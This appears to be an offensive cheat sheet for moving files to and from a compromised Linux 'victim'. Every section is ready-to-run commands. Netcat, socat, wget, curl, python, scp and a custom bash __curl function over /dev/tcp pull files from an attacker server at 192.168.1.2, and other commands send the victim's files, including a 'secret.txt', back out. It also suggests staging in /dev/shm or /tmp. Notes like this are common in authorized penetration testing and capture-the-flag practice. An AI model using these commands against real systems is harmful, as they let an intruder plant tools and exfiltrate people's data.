File Transfer (Linux)

Netcat

Victim

nc -lvnp 443 > file                                                                                                        
busybox nc -lp 443 > file

Attacker

nc 192.168.1.2 443 < file

cURL - Wget - Python

Attacker

python -m SimpleHTTPServer 80
python3 -m http.server 80
php -S 0.0.0.0:80

Victim

wget http://192.168.1.2/file
busybox wget http://192.168.1.2/file

curl http://192.168.1.2/file -o file

python -c "import urllib.request; urllib.request.urlretrieve('http://192.168.1.2/file', 'file')"
python3 -c "import urllib.request; urllib.request.urlretrieve('http://192.168.1.2/file', 'file')"

__curl (Function)

Attacker

python -m SimpleHTTPServer 80
python3 -m http.server 80
php -S 0.0.0.0:80

Victim

Create Function

function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

Usage

__curl http://192.168.1.2/file > file

Socat

Attacker

socat -u TCP-LISTEN:443,reuseaddr - > file

Victim

socat -u FILE:file TCP:192.168.1.2:443

Cat

Attacker

nc -lvnp 1234 < file

Victim

cd /dev/shm
#or
cd /tmp

cat < /dev/tcp/192.168.1.2/1234 > file

Base64

Victim

base64 -w0 file
# or
base64 -w0 file | xclip -sel clip

Attacker

base64 -d <<< 'QkxBQkxB' > file

SCP

Victim > Attacker

service sshd start

# file
scp file root@192.168.1.2:/tmp

# files
scp file1 file2 root@192.168.1.2:/tmp

# file (other port)
scp -P1234 file root@192.168.1.111:/tmp

# folder
scp -r folder/ root@192.168.1.2:/tmp

Attacker > Victim

# file
scp victim@192.168.1.2:/home/victim/secret.txt .

# file (other port)
scp -P 5000 victim@192.168.1.2:~/image .